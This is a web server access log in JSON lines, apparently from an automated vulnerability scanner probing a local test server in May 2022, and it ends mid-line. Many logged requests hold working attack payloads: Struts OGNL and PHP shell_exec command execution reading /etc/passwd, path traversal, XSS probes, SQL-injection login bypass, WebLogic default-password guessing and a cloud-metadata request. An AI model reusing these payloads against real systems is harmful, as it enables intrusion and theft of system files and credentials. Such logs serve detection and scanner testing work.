+{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"100.100.100.200","request":"GET http://100.100.100.200/dynamic/instance-identity/document HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.035","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/groovyconsole.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"j_username=weblogic&j_password=weblogic&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/openid-configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NON_EXISTING_PATH/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /@https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"j_username=weblogic&j_password=weblogic1&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/realms/master/.well-known/openid-configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel-filemanager?type=Files HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Default.aspx?pid=Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C/%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"j_username=weblogic&j_password=welcome1&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebConsole/api/security/auth/loginServers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantis/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example%E3%80%82com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"j_username=weblogic&j_password=Oracle@123&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /script/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantisBT/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"j_username=weblogic&j_password=weblogic123&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /user.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/login.php", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"j_username=admin&j_password=12345678&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bugs/verify.php?confirm_hash=&id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"j_username=admin&j_password=security&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ReportServer HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"j_username=system&j_password=password&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com;@ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dev/tests/functional/credentials.xml.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.vscode/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https%3a%2f%2fexample.com%2f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dev/tests/functional/etc/config.xml.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.ico 